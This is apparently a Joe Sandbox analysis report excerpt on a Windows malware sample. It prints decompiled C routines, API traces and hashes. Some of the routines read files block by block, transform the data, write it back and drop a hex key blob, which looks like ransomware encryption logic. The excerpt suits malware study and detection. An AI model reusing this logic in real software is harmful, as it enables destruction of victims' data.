                                                                                                                                                        0x00408e48
                                                                                                                                                        0x00408e4b
                                                                                                                                                        0x00408e4c
                                                                                                                                                        0x00408e4d
                                                                                                                                                        0x00408e4e
                                                                                                                                                        0x00408e50
                                                                                                                                                        0x00408e57
                                                                                                                                                        0x00408e57
                                                                                                                                                        0x00408e59
                                                                                                                                                        0x00408e5b
                                                                                                                                                        0x00408e64
                                                                                                                                                        0x00408e6e
                                                                                                                                                        0x00408e87
                                                                                                                                                        0x00408e89
                                                                                                                                                        0x00408e8b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408e91
                                                                                                                                                        0x00408e91
                                                                                                                                                        0x00408e93
                                                                                                                                                        0x00408e99
                                                                                                                                                        0x00408e9e
                                                                                                                                                        0x00408ea2
                                                                                                                                                        0x00408ea3
                                                                                                                                                        0x00408ea3
                                                                                                                                                        0x00408ead
                                                                                                                                                        0x00408ebe
                                                                                                                                                        0x00408edd
                                                                                                                                                        0x00408eec
                                                                                                                                                        0x00408efd
                                                                                                                                                        0x00408f07
                                                                                                                                                        0x00408f07
                                                                                                                                                        0x00408f0c
                                                                                                                                                        0x00408f12
                                                                                                                                                        0x00408f12
                                                                                                                                                        0x00408f12
                                                                                                                                                        0x00408f13
                                                                                                                                                        0x00408f17
                                                                                                                                                        0x00408f2a
                                                                                                                                                        0x00408f31
                                                                                                                                                        0x00408f3a
                                                                                                                                                        0x00408f4e
                                                                                                                                                        0x00408f53
                                                                                                                                                        0x00408f58
                                                                                                                                                        0x00408f59
                                                                                                                                                        0x00408f5e
                                                                                                                                                        0x00408f6e
                                                                                                                                                        0x00408f7a
                                                                                                                                                        0x00408f89
                                                                                                                                                        0x00408f8e
                                                                                                                                                        0x00408f8e
                                                                                                                                                        0x00408f8e
                                                                                                                                                        0x00408f91
                                                                                                                                                        0x00408f9a
                                                                                                                                                        0x00408fa2
                                                                                                                                                        0x00408fa3
                                                                                                                                                        0x00408fb3
                                                                                                                                                        0x00408fbd
                                                                                                                                                        0x00408fc4
                                                                                                                                                        0x00408fc7
                                                                                                                                                        0x00408fce
                                                                                                                                                        0x00408fce
                                                                                                                                                        0x00408fc9
                                                                                                                                                        0x00408fcb
                                                                                                                                                        0x00408fcb
                                                                                                                                                        0x00408fd0
                                                                                                                                                        0x00408fd1
                                                                                                                                                        0x00408fd3
                                                                                                                                                        0x00408ff3
                                                                                                                                                        0x00408ff7
                                                                                                                                                        0x00408ffc
                                                                                                                                                        0x00409002
                                                                                                                                                        0x00409006
                                                                                                                                                        0x00409009
                                                                                                                                                        0x0040900d
                                                                                                                                                        0x0040900f
                                                                                                                                                        0x00409011
                                                                                                                                                        0x00409038
                                                                                                                                                        0x00409038
                                                                                                                                                        0x00409039
                                                                                                                                                        0x0040903e
                                                                                                                                                        0x0040903f
                                                                                                                                                        0x00409040
                                                                                                                                                        0x00409045
                                                                                                                                                        0x00409047
                                                                                                                                                        0x0040904c
                                                                                                                                                        0x0040904d
                                                                                                                                                        0x0040904e
                                                                                                                                                        0x00409052
                                                                                                                                                        0x00409056
                                                                                                                                                        0x0040905b
                                                                                                                                                        0x0040905d
                                                                                                                                                        0x0040905f
                                                                                                                                                        0x00409061
                                                                                                                                                        0x00409065
                                                                                                                                                        0x00409067
                                                                                                                                                        0x00409097
                                                                                                                                                        0x00409097
                                                                                                                                                        0x0040909e
                                                                                                                                                        0x004090a2
                                                                                                                                                        0x004090a7
                                                                                                                                                        0x004090a7
                                                                                                                                                        0x004090ad
                                                                                                                                                        0x004090b5
                                                                                                                                                        0x004090ba
                                                                                                                                                        0x004090bd
                                                                                                                                                        0x004090bf
                                                                                                                                                        0x004090c3
                                                                                                                                                        0x004090c9
                                                                                                                                                        0x004090d0
                                                                                                                                                        0x004090d4
                                                                                                                                                        0x004090d9
                                                                                                                                                        0x004090db
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004090ef
                                                                                                                                                        0x00409107
                                                                                                                                                        0x00409114
                                                                                                                                                        0x00409120
                                                                                                                                                        0x00409132
                                                                                                                                                        0x00409136
                                                                                                                                                        0x0040913b
                                                                                                                                                        0x00409143
                                                                                                                                                        0x00409163
                                                                                                                                                        0x00409168
                                                                                                                                                        0x0040916e
                                                                                                                                                        0x00409170
                                                                                                                                                        0x00409191
                                                                                                                                                        0x00409191
                                                                                                                                                        0x004091a0
                                                                                                                                                        0x004091ac
                                                                                                                                                        0x004091b1
                                                                                                                                                        0x004091bd
                                                                                                                                                        0x004091cc
                                                                                                                                                        0x004091d0
                                                                                                                                                        0x004091d5
                                                                                                                                                        0x004091e3
                                                                                                                                                        0x004091e9
                                                                                                                                                        0x004091ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004091ed
                                                                                                                                                        0x00409069
                                                                                                                                                        0x0040906f
                                                                                                                                                        0x0040906f
                                                                                                                                                        0x00409071
                                                                                                                                                        0x00409073
                                                                                                                                                        0x00409077
                                                                                                                                                        0x0040907b
                                                                                                                                                        0x00409080
                                                                                                                                                        0x00409082
                                                                                                                                                        0x0040908d
                                                                                                                                                        0x00409090
                                                                                                                                                        0x00409092
                                                                                                                                                        0x00409092
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409082
                                                                                                                                                        0x0040906b
                                                                                                                                                        0x0040906d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0040906d
                                                                                                                                                        0x00409013
                                                                                                                                                        0x0040901d
                                                                                                                                                        0x0040901d
                                                                                                                                                        0x0040901f
                                                                                                                                                        0x00409021
                                                                                                                                                        0x00409026
                                                                                                                                                        0x00409028
                                                                                                                                                        0x00409028
                                                                                                                                                        0x0040902a
                                                                                                                                                        0x0040902e
                                                                                                                                                        0x00409032
                                                                                                                                                        0x00409034
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409034
                                                                                                                                                        0x00409015
                                                                                                                                                        0x0040901b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408fd5
                                                                                                                                                        0x00408fd5
                                                                                                                                                        0x00408fd6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408fde
                                                                                                                                                        0x00408fd3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408e31

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040274B: GetProcessHeap.KERNEL32(00000008,?,00406D21,00000002,?,?,?,?,?,?,?,?,?,?,00409F25), ref: 00402757
                                                                                                                                                          • Part of subcall function 0040274B: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409F25), ref: 0040275E
                                                                                                                                                        • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,80000000,00000000,?,00000000,74E06920,00000000,74E482B0), ref: 00408DDF
                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,74E06920,00000000,74E482B0), ref: 00408DF6
                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000008,?,?,00000000,00000006,00000001,?,?), ref: 00408ECA
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000020,?,?,?,?,?,?,00000020,?), ref: 00408FD6
                                                                                                                                                          • Part of subcall function 00402779: GetProcessHeap.KERNEL32(00000000,?,00409C7C,00000020,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000210,00401124,00000020,00000000,?,?,?,?,00409F25), ref: 0040277F
                                                                                                                                                          • Part of subcall function 00402779: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,00409F25), ref: 00402786
                                                                                                                                                        • _alldiv.NTDLL(?,?,00002000,00000000), ref: 00409040
                                                                                                                                                        • _allrem.NTDLL(?,?,00002000,00000000), ref: 00409056
                                                                                                                                                        • _allrem.NTDLL(?,?,00000002,00000000), ref: 0040907B
                                                                                                                                                        • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,?,?,00000020,?,?,?,?,?), ref: 00409120
                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000030,?,00000000,?,00000000,?,?,?,?), ref: 004091E3
                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,74E06920,00000000,74E482B0), ref: 004091F8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileHeap$CloseProcessWrite_allrem$AllocAllocateChangeCreateFindHandleNotificationSize_alldivlstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1900095102-0
                                                                                                                                                        • Opcode ID: 61d803c80494e725052033808ba86884b81a5213403a2f395026c44d9201bc1e
                                                                                                                                                        • Instruction ID: fe6b832c0d50ad05d819153957b86ab8847557004c4262f58dd99bba07c43891
                                                                                                                                                        • Opcode Fuzzy Hash: 61d803c80494e725052033808ba86884b81a5213403a2f395026c44d9201bc1e
                                                                                                                                                        • Instruction Fuzzy Hash: 93D1B4725083447BD721EBA5CD45F9BB7ECAF88304F004C3EB685E61D2DA79D9048766
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        C-Code - Quality: 55%
                                                                                                                                                        			E0040934A(void* __ebx, void* __eflags, long _a4) {
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				void* __ebp;
                                                                                                                                                        				void* _t7;
                                                                                                                                                        				int _t8;
                                                                                                                                                        				void* _t13;
                                                                                                                                                        				WCHAR* _t17;
                                                                                                                                                        				void* _t18;
                                                                                                                                                        
                                                                                                                                                        				_t17 = _a4;
                                                                                                                                                        				PathRemoveFileSpecW(_t17);
                                                                                                                                                        				PathAddBackslashW(_t17);
                                                                                                                                                        				lstrcatW(_t17,  *0x40cab0);
                                                                                                                                                        				_t7 = E00409333(_t17);
                                                                                                                                                        				if(_t7 != 0) {
                                                                                                                                                        					return _t7;
                                                                                                                                                        				}
                                                                                                                                                        				_t8 = CreateFileW(_t17, 0x40000000, 0, 0, 1, 0x80, 0); // executed
                                                                                                                                                        				_t18 = _t8;
                                                                                                                                                        				_t21 = _t18 - 0xffffffff;
                                                                                                                                                        				if(_t18 != 0xffffffff) {
                                                                                                                                                        					_push(_t18);
                                                                                                                                                        					_push(0x20);
                                                                                                                                                        					_push( *0x40ca8c);
                                                                                                                                                        					_a4 = 0;
                                                                                                                                                        					_push( *0x401928);
                                                                                                                                                        					_push( *0x40ca94);
                                                                                                                                                        					E00408B05(__ebx, _t13, 0, _t18, _t21);
                                                                                                                                                        					WriteFile(_t18, "67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A\nA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB\nA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40\nE7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66\nC0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82\n5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C\n92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D\n12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0\n72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D\n30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0\nE2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2\nAC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C\n5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10\n6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32\nE4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5\n79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74\n", 0x300,  &_a4, 0); // executed
                                                                                                                                                        					_push(_t18);
                                                                                                                                                        					_push(0x20);
                                                                                                                                                        					_push( *0x40ca8c);
                                                                                                                                                        					_push( *0x401930);
                                                                                                                                                        					_push( *0x40ca90);
                                                                                                                                                        					_t8 = E00408B05(__ebx, _t13, 0, _t18, _t21);
                                                                                                                                                        					if(_t18 != 0) {
                                                                                                                                                        						_t8 = FindCloseChangeNotification(_t18); // executed
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				return _t8;
                                                                                                                                                        			}











                                                                                                                                                        0x0040934e
                                                                                                                                                        0x00409352
                                                                                                                                                        0x00409359
                                                                                                                                                        0x00409366
                                                                                                                                                        0x0040936d
                                                                                                                                                        0x00409374
                                                                                                                                                        0x004093f1
                                                                                                                                                        0x004093f1
                                                                                                                                                        0x00409389
                                                                                                                                                        0x0040938f
                                                                                                                                                        0x00409391
                                                                                                                                                        0x00409394
                                                                                                                                                        0x00409396
                                                                                                                                                        0x00409397
                                                                                                                                                        0x00409399
                                                                                                                                                        0x0040939f
                                                                                                                                                        0x004093a2
                                                                                                                                                        0x004093a8
                                                                                                                                                        0x004093ae
                                                                                                                                                        0x004093c3
                                                                                                                                                        0x004093c9
                                                                                                                                                        0x004093ca
                                                                                                                                                        0x004093cc
                                                                                                                                                        0x004093d2
                                                                                                                                                        0x004093d8
                                                                                                                                                        0x004093de
                                                                                                                                                        0x004093e5
                                                                                                                                                        0x004093e8
                                                                                                                                                        0x004093e8
                                                                                                                                                        0x004093e5
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,74E06920,00000000,0040992E,?,?,?,?,?,?,00000000,?,00000000,?,004069E5,?), ref: 00409352
                                                                                                                                                        • PathAddBackslashW.SHLWAPI(?,?,?,?,?,?,00000000,?,00000000,?,004069E5,?,00000000,00000000,?,?), ref: 00409359
                                                                                                                                                        • lstrcatW.KERNEL32(?), ref: 00409366
                                                                                                                                                          • Part of subcall function 00409333: GetFileAttributesW.KERNELBASE(00000000,00409DB2,00000000), ref: 00409337
                                                                                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000080,00000000,00000000,?,?,?,?,?,?,00000000,?), ref: 00409389
                                                                                                                                                        • WriteFile.KERNELBASE(00000000,67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0AA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FBA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 825C C4 72 95 44 72 E0,00000300,?,00000000,00000020,00000000,?,?,?,?,?,00000000,?,00000000,?), ref: 004093C3
                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000020,00000000,?,?,?,?,?,00000000,?,00000000,?,004069E5,?,00000000,00000000), ref: 004093E8
                                                                                                                                                        Strings
                                                                                                                                                        • 67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0AA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FBA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 825C C4 72 95 44 72 E0, xrefs: 004093BD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Path$AttributesBackslashChangeCloseCreateFindNotificationRemoveSpecWritelstrcat
                                                                                                                                                        • String ID: 67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0AA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FBA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 825C C4 72 95 44 72 E0
                                                                                                                                                        • API String ID: 2700900949-1800918899
                                                                                                                                                        • Opcode ID: ef47b01ec4d2aea1e12e6a638949ed2ce9ad58347ccfbfd2b277f0a4a5532e64
                                                                                                                                                        • Instruction ID: 59931ce9c114eb1a1b61b4bcd56ffe64dbd062578dec1c5ba65cecd2564a4a72
                                                                                                                                                        • Opcode Fuzzy Hash: ef47b01ec4d2aea1e12e6a638949ed2ce9ad58347ccfbfd2b277f0a4a5532e64
                                                                                                                                                        • Instruction Fuzzy Hash: 0E018432102164BBD7216B52EE49F8B3E2DEB4A761F004135FA45B14F1C7355941CFAC
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 302 409aab-409ad3 call 408b05 lstrlenA 305 409ae1-409b0e HeapCreate HeapAlloc call 4026b2 302->305 306 409ad5-409ad9 302->306 311 409b10 305->311 312 409b28-409b34 305->312 307 409adb 306->307 308 409adc-409adf 306->308 307->308 308->305 308->306 313 409b12-409b26 call 4026b2 311->313 313->312
                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                        			E00409AAB(void* __ecx, void* __eflags, CHAR* _a4, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                        				signed int* _v12;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				void* __ebp;
                                                                                                                                                        				int _t8;
                                                                                                                                                        				void* _t9;
                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                        				void* _t14;
                                                                                                                                                        				intOrPtr* _t15;
                                                                                                                                                        				long _t17;
                                                                                                                                                        				CHAR* _t24;
                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                        				void* _t26;
                                                                                                                                                        				long _t27;
                                                                                                                                                        				signed int _t28;
                                                                                                                                                        
                                                                                                                                                        				_t24 = _a4;
                                                                                                                                                        				_push(0);
                                                                                                                                                        				_push(0x20);
                                                                                                                                                        				_push(_a12);
                                                                                                                                                        				_push(_a16);
                                                                                                                                                        				_push(_t24);
                                                                                                                                                        				E00408B05(_t14, __ecx, _t24, _t26, __eflags);
                                                                                                                                                        				_t27 = 0;
                                                                                                                                                        				_t8 = lstrlenA(_t24);
                                                                                                                                                        				_t17 = 0;
                                                                                                                                                        				if(_t8 > 0) {
                                                                                                                                                        					do {
                                                                                                                                                        						if( *((char*)(_t17 + _t24)) == 0x2c) {
                                                                                                                                                        							_t27 = _t27 + 1;
                                                                                                                                                        						}
                                                                                                                                                        						_t17 = _t17 + 1;
                                                                                                                                                        					} while (_t17 < _t8);
                                                                                                                                                        				}
                                                                                                                                                        				_t28 = _t27 + 1; // executed
                                                                                                                                                        				_t9 = HeapCreate(0, 0x1000, 0); // executed
                                                                                                                                                        				_t15 = HeapAlloc(_t9, 0, _t28 << 2);
                                                                                                                                                        				_t11 = E004026B2(_t24, ", ");
                                                                                                                                                        				if(_t11 != 0) {
                                                                                                                                                        					_t25 = _t15;
                                                                                                                                                        					do {
                                                                                                                                                        						 *_t25 = _t11;
                                                                                                                                                        						_t11 = E004026B2(0, ",");
                                                                                                                                                        						_t25 = _t25 + 4;
                                                                                                                                                        					} while (_t11 != 0);
                                                                                                                                                        				}
                                                                                                                                                        				 *_v12 = _t28;
                                                                                                                                                        				return _t15;
                                                                                                                                                        			}



















                                                                                                                                                        0x00409aaf
                                                                                                                                                        0x00409ab5
                                                                                                                                                        0x00409ab6
                                                                                                                                                        0x00409ab8
                                                                                                                                                        0x00409abc
                                                                                                                                                        0x00409ac0
                                                                                                                                                        0x00409ac1
                                                                                                                                                        0x00409ac7
                                                                                                                                                        0x00409ac9
                                                                                                                                                        0x00409acf
                                                                                                                                                        0x00409ad3
                                                                                                                                                        0x00409ad5
                                                                                                                                                        0x00409ad9
                                                                                                                                                        0x00409adb
                                                                                                                                                        0x00409adb
                                                                                                                                                        0x00409adc
                                                                                                                                                        0x00409add
                                                                                                                                                        0x00409ad5
                                                                                                                                                        0x00409ae8
                                                                                                                                                        0x00409ae9
                                                                                                                                                        0x00409b03
                                                                                                                                                        0x00409b05
                                                                                                                                                        0x00409b0e
                                                                                                                                                        0x00409b10
                                                                                                                                                        0x00409b12
                                                                                                                                                        0x00409b18
                                                                                                                                                        0x00409b1a
                                                                                                                                                        0x00409b1f
                                                                                                                                                        0x00409b24
                                                                                                                                                        0x00409b12
                                                                                                                                                        0x00409b2d
                                                                                                                                                        0x00409b34

                                                                                                                                                        APIs
                                                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000290,00000000,00000020,00000000,00000000,.xls,00000800,00001000,00409D2A,Windows,0040CA9C,00000290,.xls,00000000), ref: 00409AC9
                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00409AE9
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000001), ref: 00409AF7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocCreatelstrlen
                                                                                                                                                        • String ID: .xls
                                                                                                                                                        • API String ID: 1413506513-990853844
                                                                                                                                                        • Opcode ID: bfb571fc6f762e11d3cb621ab63ed3158648659534720c4a917e0bd8968ddf3a
                                                                                                                                                        • Instruction ID: f2dd00aaa737754973e9d1f41287052e3b927762cbcf37e2df00f3b24a9a13d8
                                                                                                                                                        • Opcode Fuzzy Hash: bfb571fc6f762e11d3cb621ab63ed3158648659534720c4a917e0bd8968ddf3a
                                                                                                                                                        • Instruction Fuzzy Hash: 880126312043056BD7240B669D08E1BBBECDF5A7A8B11043FF581F22E2DAB6EC418728
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 316 408c4c-408c82 call 408ac1 call 402779 321 408c88-408cb1 call 402647 ReadFile 316->321 322 408d6e-408d74 316->322 325 408cb3 321->325 326 408d06-408d0a 321->326 327 408cb5-408cb7 325->327 328 408cb9-408cc6 _allrem 325->328 329 408d44-408d68 call 408ac1 WriteFile call 402765 326->329 330 408d0c 326->330 327->326 327->328 332 408cc8-408ce7 call 408a3f 328->332 333 408cec-408cfb 328->333 344 408d6d 329->344 334 408d14-408d21 _allrem 330->334 335 408d0e-408d12 330->335 332->333 333->328 338 408cfd 333->338 334->329 339 408d23-408d3f call 408a3f 334->339 335->329 335->334 341 408d03 338->341 342 408cff-408d01 338->342 339->329 341->326 342->328 342->341 344->322
                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E00408C4C(void* __ecx, signed int __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				long _v12;
                                                                                                                                                        				long _v16;
                                                                                                                                                        				void* _t43;
                                                                                                                                                        				signed int _t47;
                                                                                                                                                        				void* _t59;
                                                                                                                                                        				signed int _t62;
                                                                                                                                                        				signed int _t64;
                                                                                                                                                        				signed int _t66;
                                                                                                                                                        				signed int _t67;
                                                                                                                                                        				long _t71;
                                                                                                                                                        				signed int _t72;
                                                                                                                                                        				signed int _t76;
                                                                                                                                                        				void* _t80;
                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                        
                                                                                                                                                        				_t66 = __edx;
                                                                                                                                                        				E00408AC1(__ecx, __edx, _a4, _a8, _a12, 0); // executed
                                                                                                                                                        				_t67 = _a16;
                                                                                                                                                        				_t71 = (_t67 << 0xd) + _a24;
                                                                                                                                                        				_v12 = 0;
                                                                                                                                                        				_v16 = 0;
                                                                                                                                                        				_t43 = E00402779(_t71);
                                                                                                                                                        				_t59 = _t43;
                                                                                                                                                        				if(_t59 == 0) {
                                                                                                                                                        					return _t43;
                                                                                                                                                        				}
                                                                                                                                                        				E00402647(_t59, 0, _t71);
                                                                                                                                                        				ReadFile(_a4, _t59, _t71,  &_v12, 0); // executed
                                                                                                                                                        				_t47 = _a20;
                                                                                                                                                        				_t62 = 0;
                                                                                                                                                        				_t72 = 0;
                                                                                                                                                        				_v8 = 0;
                                                                                                                                                        				_t76 = _t47;
                                                                                                                                                        				if(_t76 < 0 || _t76 <= 0 && _t67 == 0) {
                                                                                                                                                        					L10:
                                                                                                                                                        					_t82 = _a28;
                                                                                                                                                        					if(_t82 >= 0 && (_t82 > 0 || _a24 > 0)) {
                                                                                                                                                        						_push(0);
                                                                                                                                                        						_push(2);
                                                                                                                                                        						_push(_t47);
                                                                                                                                                        						_push(_t67);
                                                                                                                                                        						L0040A3D4();
                                                                                                                                                        						if((_t47 | _t66) == 0) {
                                                                                                                                                        							_push((_a20 << 0x00000020 | _t67) << 0xd);
                                                                                                                                                        							_push(_t67 << 0xd);
                                                                                                                                                        							_push(_a40);
                                                                                                                                                        							_push(_a36);
                                                                                                                                                        							_push(_a28);
                                                                                                                                                        							_push(_a24);
                                                                                                                                                        							_push(_t59);
                                                                                                                                                        							_push(_a32);
                                                                                                                                                        							E00408A3F(_t66);
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					E00408AC1(_t62, _t66, _a4, _a8, _a12, 0); // executed
                                                                                                                                                        					WriteFile(_a4, _t59, _v12,  &_v16, 0); // executed
                                                                                                                                                        					return E00402765(_t59);
                                                                                                                                                        				} else {
                                                                                                                                                        					do {
                                                                                                                                                        						_push(0);
                                                                                                                                                        						_push(2);
                                                                                                                                                        						_push(_t62);
                                                                                                                                                        						_push(_t72);
                                                                                                                                                        						L0040A3D4();
                                                                                                                                                        						_t47 = _t47 | _t66;
                                                                                                                                                        						if(_t47 == 0) {
                                                                                                                                                        							_t64 = _t72;
                                                                                                                                                        							_push((_v8 << 0x00000020 | _t64) << 0xd);
                                                                                                                                                        							_push(_t64 << 0xd);
                                                                                                                                                        							_push(_a40);
                                                                                                                                                        							_push(_a36);
                                                                                                                                                        							_push(0);
                                                                                                                                                        							_push(0x2000);
                                                                                                                                                        							_push(_t59);
                                                                                                                                                        							_push(_a32);
                                                                                                                                                        							_t47 = E00408A3F(_t66);
                                                                                                                                                        						}
                                                                                                                                                        						_t62 = _v8;
                                                                                                                                                        						_t72 = _t72 + 1;
                                                                                                                                                        						asm("adc ecx, 0x0");
                                                                                                                                                        						_v8 = _t62;
                                                                                                                                                        						_t80 = _t62 - _a20;
                                                                                                                                                        					} while (_t80 < 0 || _t80 <= 0 && _t72 < _t67);
                                                                                                                                                        					_t47 = _a20;
                                                                                                                                                        					goto L10;
                                                                                                                                                        				}
                                                                                                                                                        			}


















                                                                                                                                                        0x00408c4c
                                                                                                                                                        0x00408c61
                                                                                                                                                        0x00408c66
                                                                                                                                                        0x00408c6e
                                                                                                                                                        0x00408c72
                                                                                                                                                        0x00408c75
                                                                                                                                                        0x00408c78
                                                                                                                                                        0x00408c7d
                                                                                                                                                        0x00408c82
                                                                                                                                                        0x00408d74
                                                                                                                                                        0x00408d74
                                                                                                                                                        0x00408c8c
                                                                                                                                                        0x00408c9f
                                                                                                                                                        0x00408ca5
                                                                                                                                                        0x00408ca8
                                                                                                                                                        0x00408caa
                                                                                                                                                        0x00408cac
                                                                                                                                                        0x00408caf
                                                                                                                                                        0x00408cb1
                                                                                                                                                        0x00408d06
                                                                                                                                                        0x00408d06
                                                                                                                                                        0x00408d0a
                                                                                                                                                        0x00408d14
                                                                                                                                                        0x00408d16
                                                                                                                                                        0x00408d18
                                                                                                                                                        0x00408d19
                                                                                                                                                        0x00408d1a
                                                                                                                                                        0x00408d21
                                                                                                                                                        0x00408d2a
                                                                                                                                                        0x00408d2e
                                                                                                                                                        0x00408d2f
                                                                                                                                                        0x00408d32
                                                                                                                                                        0x00408d35
                                                                                                                                                        0x00408d38
                                                                                                                                                        0x00408d3b
                                                                                                                                                        0x00408d3c
                                                                                                                                                        0x00408d3f
                                                                                                                                                        0x00408d3f
                                                                                                                                                        0x00408d21
                                                                                                                                                        0x00408d4f
                                                                                                                                                        0x00408d61
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408cb9
                                                                                                                                                        0x00408cb9
                                                                                                                                                        0x00408cb9
                                                                                                                                                        0x00408cbb
                                                                                                                                                        0x00408cbd
                                                                                                                                                        0x00408cbe
                                                                                                                                                        0x00408cbf
